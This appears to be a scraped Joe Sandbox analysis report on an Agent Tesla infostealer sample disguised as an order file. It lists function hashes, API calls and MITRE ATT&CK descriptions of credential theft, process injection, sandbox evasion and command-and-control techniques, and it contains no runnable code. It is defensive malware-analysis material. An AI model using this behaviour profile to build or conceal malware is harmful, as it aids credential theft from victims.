Opcode Fuzzy Hash: 37c5ba31397331b5a22aa8046f41cbd5b905ed6ee9a0ba155a9d1a8f5d5045c4
Instruction Fuzzy Hash: DB018F75A043408FDB648F5AD885766FBA4EF00320F18C4ABDD498F646D778E808DA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F7141A, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 00F7146A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: b12f9cf3bf21e91adcb62e1a1c9d645d62a19364b213e1452e700d1a465bfb14
Instruction ID: ae88e7dcde1322b9c2496602626ed25fe9ff09ae6966740e0882ee0c78e6445b
Opcode Fuzzy Hash: b12f9cf3bf21e91adcb62e1a1c9d645d62a19364b213e1452e700d1a465bfb14
Instruction Fuzzy Hash: EF018F71500604ABD654DF1ADC86B22FBA4EB89B20F14811AED085B641D331B916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A47A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 1DB3A4AC

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4f3fd1ecaaa02cde1a83d7fb91206144929a31244cf12f9b8df2a8d783fbfc86
Instruction ID: eaf9c55e1b23d42962172d0c530b435ed770b85cd3e53744bc6ce750fa217ca5
Opcode Fuzzy Hash: 4f3fd1ecaaa02cde1a83d7fb91206144929a31244cf12f9b8df2a8d783fbfc86
Instruction Fuzzy Hash: F501D6709003409FDB11CF1AD888752FF90EF00721F18C4AADD498F646D378E404CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A876, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 1DB3A8A8

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2cfcba87995528cecdd2e269ecd0e4e3a28061bb57c613883e3e7a67356c597b
Instruction ID: 8c46c55e4a6bf526844c8cd6860f7b60030694237f5ef99c66fbd3aa907a0bf5
Opcode Fuzzy Hash: 2cfcba87995528cecdd2e269ecd0e4e3a28061bb57c613883e3e7a67356c597b
Instruction Fuzzy Hash: E5F0AF349007409FDB218F0AD888762FFA0EF04721F18C49ADD4A4B756E379E809DEB2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5548, Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00FB5615

Memory Dump Source

Source File: 00000008.00000002.1726286402.0000000000FB5000.00000040.00000001.sdmp, Offset: 00FB5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_fb5000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7281f01823a10e44b58596e76a94e0624fc25bd17dab6b2910e0abfcd6183f63
Instruction ID: 5ffb686baa5390dae0709fdf453451cbc2a229c49f66cdd42937288a8e04e2fd
Opcode Fuzzy Hash: 7281f01823a10e44b58596e76a94e0624fc25bd17dab6b2910e0abfcd6183f63
Instruction Fuzzy Hash: 56D0973B348B8927EB318A08ACF03C537E37F86710FA88242D845870C0D37A88829A12

Uniqueness

Uniqueness Score: -1.00%

Function 20543207, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649cd068cbb4572ede74b9062ac85855f38991e4149138b0e190dfaf7b3de1db
Instruction ID: 7da5f3f8108a2ee66ef2f8fe58b592361eb42fec6ecb3c5b930a4eb8dad463bd
Opcode Fuzzy Hash: 649cd068cbb4572ede74b9062ac85855f38991e4149138b0e190dfaf7b3de1db
Instruction Fuzzy Hash: 7A315E7550C3809FD341CF19D840956BFF4EF89224F18899EF888D7252D235E919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 20542F8A, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c018ba9ae1f3fdeb41ddcece11230ec4129b2d51b7501db423c14d2fb7567d13
Instruction ID: 5007cf328b054e9a5820197cdf47f220cf00765c39124b0eb10d1af151a31271
Opcode Fuzzy Hash: c018ba9ae1f3fdeb41ddcece11230ec4129b2d51b7501db423c14d2fb7567d13
Instruction Fuzzy Hash: 5521B4B5608341AFD350CF19D880A5BBBE4EF89664F14896EF888D7311E375E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB70726, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1731144989.000000001DB70000.00000040.00000040.sdmp, Offset: 1DB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70d9a558cf410a8583bcce65e28b6ab7c7321b2565fd108cff372b1501eb532
Instruction ID: 7b3dde0026a786af91e6e0a0e898bb0e5be75119817bafa6e397f147b6821add
Opcode Fuzzy Hash: f70d9a558cf410a8583bcce65e28b6ab7c7321b2565fd108cff372b1501eb532
Instruction Fuzzy Hash: 8D218E351093C49FD3068B20C950B15BFB1EB46708F198AEED8895B693C37AD817CB42

Uniqueness

Uniqueness Score: -1.00%

Function 205439FC, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7b430d50b61910f32ff82edb3bb1ef84a37cc87fa1f9ecbde904e8239d0b83
Instruction ID: 4b4e3dce7783912598fbd00186cffce13ab74edee91179b1a9ecebff770b12bc
Opcode Fuzzy Hash: bb7b430d50b61910f32ff82edb3bb1ef84a37cc87fa1f9ecbde904e8239d0b83
Instruction Fuzzy Hash: 8811BAB5608341AFD350CF19D880A5BFBE4FB88664F14896EF898D7311E331E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB7075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1731144989.000000001DB70000.00000040.00000040.sdmp, Offset: 1DB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ebc795c43f0fa3260af0aab67b58227b7e06eaea0f6fa7747f9cadff54550c
Instruction ID: f8fb57d6ec915d805499830d06e96327436c27c49b6d0bab6c51d60bd4550851
Opcode Fuzzy Hash: 42ebc795c43f0fa3260af0aab67b58227b7e06eaea0f6fa7747f9cadff54550c
Instruction Fuzzy Hash: 7911DA38204385DFD306CB14C980B26BBA5EB44B08F24C59DE94A0B6D3C77BD803CE52

Uniqueness

Uniqueness Score: -1.00%

Function 1DB705CF, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1731144989.000000001DB70000.00000040.00000040.sdmp, Offset: 1DB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119ee3c6e9361e7418c56ea456bb4416795a5916c796f484e54ab05ca96a4ff5
Instruction ID: 5c6441a72e1b4bd4b57147e747cc2d009c4a699ad36fdb46c296e2dc0bf1a259
Opcode Fuzzy Hash: 119ee3c6e9361e7418c56ea456bb4416795a5916c796f484e54ab05ca96a4ff5
Instruction Fuzzy Hash: 340186B65097806FD7128B06AC40863FFE8EB86620749C59FEC49DB656D225A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB70818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1731144989.000000001DB70000.00000040.00000040.sdmp, Offset: 1DB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction ID: 1dc842f162e1ac56e9947e701ae59b5023900858e6baf969cdadfe28f1bb016a
Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
Instruction Fuzzy Hash: A1F0FB39104645DFC206CB40D940B15FBA2EB89718F24C6A9E9590B752C737D813DA82

Uniqueness

Uniqueness Score: -1.00%

Function 1DB705F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1731144989.000000001DB70000.00000040.00000040.sdmp, Offset: 1DB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3be47936da8ee360e6572f5fc0149bc044964f92434c73affefd41b02e476c6
Instruction ID: 14048490fd224706a97ea8e669d50aeb444702a2d3da0501e2fe5df29695389a
Opcode Fuzzy Hash: d3be47936da8ee360e6572f5fc0149bc044964f92434c73affefd41b02e476c6
Instruction Fuzzy Hash: CEE092B66007005BD650CF0AEC81462FBD4EB84630B18C07FDC0D8B701E635F904CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 20543A67, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c64bd4fa619cee90c278c90f7cd87f95ec91d704dd71ce4eb5cf9e17d1bb1c
Instruction ID: 26bc509f4d98fb263374dafb436223ed258619806e8e9674b617197165d3e7ca
Opcode Fuzzy Hash: 21c64bd4fa619cee90c278c90f7cd87f95ec91d704dd71ce4eb5cf9e17d1bb1c
Instruction Fuzzy Hash: F0E0D8B26403006BD6508F069C85B23FB98DB80A30F04C467ED085B742E171B5148AE2

Uniqueness

Uniqueness Score: -1.00%

Function 20543313, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086740de1a1ac450638ac2e8c9ec704ba94a0c52fc37d1a646ce6c98f5e0f257
Instruction ID: 8ca42a3ce70bc41bfcecc5503dc8d51fc2a1d38b20c783660644cd8510a4c9c2
Opcode Fuzzy Hash: 086740de1a1ac450638ac2e8c9ec704ba94a0c52fc37d1a646ce6c98f5e0f257
Instruction Fuzzy Hash: 3EE0D8B26003006BD2508F069C85B23FB98DB80A30F14C457ED085B702E172F514C9E2

Uniqueness

Uniqueness Score: -1.00%

Function 20542FFF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1733955799.0000000020540000.00000040.00000001.sdmp, Offset: 20540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa771ba2feed7f103c2fc497f9ab0431fdd5182dff926133c4fb223582bee8c
Instruction ID: 6fdf07be71877e8713204d6ccdf80daa9bb5341d2b83e761d803e1967873633c
Opcode Fuzzy Hash: 3fa771ba2feed7f103c2fc497f9ab0431fdd5182dff926133c4fb223582bee8c
Instruction Fuzzy Hash: 29E048B26417446BD650CF069C85B63FB98DB80A30F14C557ED085B742E175B51489E6

Uniqueness

Uniqueness Score: -1.00%

Function 1DB323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1730941488.000000001DB32000.00000040.00000001.sdmp, Offset: 1DB32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db32000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42da1da4f1a15fec10cd5b96a77fc25cef36fb28ccd16c031ce99b31f27b1e3b
Instruction ID: 92db4b7f35c02eb464153af235aa336cec0785f3ebd817408fcd6144a0a2cf2a
Opcode Fuzzy Hash: 42da1da4f1a15fec10cd5b96a77fc25cef36fb28ccd16c031ce99b31f27b1e3b
Instruction Fuzzy Hash: 91D05E79604B915FD3128A1CC1A1BA53BD4EB52B05F4644F9A8018B767C768E681E201

Uniqueness

Uniqueness Score: -1.00%

Function 1DB323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1730941488.000000001DB32000.00000040.00000001.sdmp, Offset: 1DB32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db32000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f61b2ae27174b235e215fe7b63bf45e44f2cdee781106d11d76bee65b87d1c88
Instruction ID: ea7e003650f117f73ef35aa6ce6e6778e603f7128012d0a9ed13dea9b802bcc4
Opcode Fuzzy Hash: f61b2ae27174b235e215fe7b63bf45e44f2cdee781106d11d76bee65b87d1c88
Instruction Fuzzy Hash: EED05E356403814FC705DB0CC2D0F6977D4EB40B01F0644E8AC028F366C7B4D8C1D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ordine n#U00b0 276.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Networking:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Function 00404746, Relevance: 47.0, APIs: 1, Strings: 30, Instructions: 529
memoryCOMMON

Function 004037CB, Relevance: 2.4, APIs: 1, Instructions: 1137
COMMON

Function 004038C1, Relevance: 2.4, APIs: 1, Instructions: 1107
COMMON

Function 0040377D, Relevance: 2.3, APIs: 1, Instructions: 1096
COMMON

Function 00403CB3, Relevance: 2.2, APIs: 1, Instructions: 963
COMMON

Function 00403D9F, Relevance: 2.2, APIs: 1, Instructions: 921
COMMON

Function 0040408E, Relevance: 2.1, APIs: 1, Instructions: 898
COMMON

Function 00404263, Relevance: 2.1, APIs: 1, Instructions: 836
memoryCOMMON

Function 00403F32, Relevance: 2.1, APIs: 1, Instructions: 811
COMMON

Function 00403F94, Relevance: 2.1, APIs: 1, Instructions: 803
COMMON

Function 00404551, Relevance: 2.0, APIs: 1, Instructions: 730
memoryCOMMON

Function 00404463, Relevance: 1.9, APIs: 1, Instructions: 674
memoryCOMMON

Function 0040F666, Relevance: 396.5, APIs: 208, Strings: 17, Instructions: 2722
COMMON

Function 0040F8A4, Relevance: 394.5, APIs: 208, Strings: 16, Instructions: 2541
COMMON

Function 00411A00, Relevance: 89.9, APIs: 49, Strings: 2, Instructions: 635
COMMON

Function 00414987, Relevance: 18.1, APIs: 12, Instructions: 123
COMMON

Function 0040157C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Function 004143A6, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 126
COMMON

Function 00414C40, Relevance: 25.6, APIs: 17, Instructions: 124
COMMON

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre